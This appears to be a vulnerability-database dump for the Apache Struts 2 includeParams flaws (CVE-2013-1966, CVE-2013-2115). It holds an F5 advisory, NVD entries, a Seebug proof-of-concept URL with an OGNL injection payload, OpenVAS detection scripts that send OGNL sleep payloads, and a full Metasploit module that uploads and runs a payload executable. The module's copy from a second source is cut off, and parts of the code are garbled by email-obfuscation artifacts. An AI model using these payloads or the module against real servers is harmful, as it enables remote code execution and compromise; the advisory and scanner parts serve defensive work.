Apache已经为此发布了一个安全公告(S2-014)以及相应补丁:
S2-014:A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks
链接:https://cwiki.apache.org/confluence/display/WW/S2-014
{"f5": [{"lastseen": "2017-06-08T00:16:02", "bulletinFamily": "software", "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-02-10T04:50:00", "published": "2017-02-09T01:52:00", "href": "https://support.f5.com/csp/article/K10506844", "id": "F5:K10506844", "title": "Apache Struts 2 vulnerabilities CVE-2013-1966, CVE-2013-2115, CVE-2013-2134, and CVE-2013-2135", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-12-09T19:52:40", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.", "edition": 7, "cvss3": {}, "published": "2013-07-10T19:55:00", "title": "CVE-2013-1966", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2013-1966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1966", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T19:52:40", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-10T19:55:00", "title": "CVE-2013-2115", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2020-09-24T13:28:00", "cpe": ["cpe:/a:apache:struts:2.3.14.1"], "id": "CVE-2013-2115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2115", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T17:42:34", "description": "No description provided by source.", "published": "2013-05-24T00:00:00", "title": "Apache Struts2 includeParams\u5c5e\u6027\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-1966)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966"], "modified": "2013-05-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60807", "id": "SSV:60807", "sourceData": "\n \u6253\u5f00Struts Blank App\u4e2d\u7684 HelloWorld.jsp\u589e\u52a0\u7c7b\u4f3c\u4e0b\u5217\u4ee3\u7801\uff1a\r\n\r\n<s:url id="url" action="HelloWorld" includeParams="all">\r\n\r\n\u8fd0\u884c struts2-blank app\r\n\r\n\u8bbf\u95ee\u4e0b\u5217\u5730\u5740: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D\r\n\r\n\u5982\u679c\u8fd4\u56de"hacked"\uff0c\u5219\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60807"}], "openvas": [{"lastseen": "2018-01-15T13:08:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "modified": "2018-01-11T00:00:00", "published": "2013-07-23T00:00:00", "id": "OPENVAS:803837", "href": "http://plugins.openvas.org/nasl.php?oid=803837", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_java_method_exec_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803837);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2 before 2.3.14.2\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.14.2 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53553\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/25980\");\n script_xref(name : \"URL\" , value : \"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-014.html\");\n script_xref(name : \"URL\" , value : \"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/example/HelloWorld.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts\" >< asres && \">English<\" >< asres)\n{\n sleep = make_list(3, 5);\n\n foreach i (sleep)\n {\n ## Construct the POST data\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\"+\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\"+\n \"a.lang.Thread%40sleep%28\"+ i +\"000%29%7d\";\n\n ## Construct the POST request\n asReq = string(\"POST /struts2-blank/example/HelloWorld.action HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n asRes = http_send_recv(port:asport, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-12T17:27:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2013-07-23T00:00:00", "id": "OPENVAS:1361412562310803837", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803837", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803837\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53553\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/25980\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_xref(name:\"URL\", value:\"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.14.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least Struts 2.3.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"www\"))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = http_get(item:dir + \"/example/HelloWorld.action\", port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res && \">Struts\" >< res && \">English<\" >< res)\n{\n sleep = make_list(3, 5);\n\n url = dir + \"/struts2-blank/example/HelloWorld.action\";\n foreach i (sleep)\n {\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\" +\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\" +\n \"a.lang.Thread%40sleep%28\" + i + \"000%29%7d\";\n\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n http_send_recv(port:port, data:req);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(99); # not vulnerable\n }\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-12T09:51:57", "edition": 2, "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts versions prior to 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. When targeting an action which requires interaction through GET the payload should be split having into account the uri limits. In this case, if the rendered jsp has more than one point of injection, it could result in payload corruption. It should happen only when the payload is larger than the uri length.", "published": "2013-06-03T00:00:00", "type": "zdt", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-03T00:00:00", "id": "1337DAY-ID-20837", "href": "https://0day.today/exploit/description/20837", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\r\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\r\n When targeting an action which requires interaction through GET the payload should\r\n be split having into account the uri limits. In this case, if the rendered jsp has\r\n more than one point of injection, it could result in payload corruption. It should\r\n happen only when the payload is larger than the uri length.\r\n },\r\n 'Author' =>\r\n [\r\n # This vulnerability was also discovered by unknown members of:\r\n # 'Coverity security Research Laboratory'\r\n # 'NSFOCUS Security Team'\r\n 'Eric Kobrin', # Vulnerability Discovery\r\n 'Douglas Rodrigues', # Vulnerability Discovery\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2115'],\r\n [ 'CVE', '2013-1966'],\r\n [ 'OSVDB', '93645'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\r\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'May 24 2013',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\r\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject_string = @inject.gsub(/CMD/,cmd)\r\n uri = normalize_uri(target_uri.path)\r\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\r\n case datastore['HTTPMETHOD']\r\n when 'POST'\r\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\r\n when 'GET'\r\n req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})\r\n end\r\n\r\n # Display a nice \"progress bar\" instead of message spam\r\n case @notify_flag\r\n when 0\r\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\r\n @notify_flag = 1\r\n when 1\r\n print(\".\") # Progress dots\r\n when 2\r\n print_status(\"Payload upload complete\")\r\n end\r\n\r\n return send_request_cgi(req_hash) #Used for check function.\r\n end\r\n\r\n def exploit\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = false\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@[email\u00a0protected]().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n print_status(\"Preparing payload...\")\r\n # Now with all the arch specific stuff set, perform the upload.\r\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\r\n # Fixed strings are tokens used for substitutions.\r\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\r\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\r\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\r\n case datastore['HTTPMETHOD']\r\n when 'GET'\r\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\r\n #This lets us know the length remaining for our base64'd payloads\r\n chunk_length = ((chunk_length/4).floor)*3\r\n when 'POST'\r\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\r\n end\r\n @notify_flag = 0\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n print_line() # new line character, after progress bar.\r\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = false)\r\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\r\n append = append ? \"true\" : \"false\" # converted for the string replacement.\r\n cmd = cmd.gsub!(/APPEND/,append)\r\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n print_status(\"Performing Check...\")\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@[email\u00a0protected](#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20837"}], "exploitdb": [{"lastseen": "2016-02-03T02:35:14", "description": "Apache Struts - includeParams Remote Code Execution. CVE-2013-1966,CVE-2013-2115. Remote exploits for multiple platform", "published": "2013-06-05T00:00:00", "type": "exploitdb", "title": "Apache Struts - includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-05T00:00:00", "id": "EDB-ID:25980", "href": "https://www.exploit-db.com/exploits/25980/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\r\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\r\n When targeting an action which requires interaction through GET the payload should\r\n be split having into account the uri limits. In this case, if the rendered jsp has\r\n more than one point of injection, it could result in payload corruption. It should\r\n happen only when the payload is larger than the uri length.\r\n },\r\n 'Author' =>\r\n [\r\n # This vulnerability was also discovered by unknown members of:\r\n # 'Coverity security Research Laboratory'\r\n # 'NSFOCUS Security Team'\r\n 'Eric Kobrin', # Vulnerability 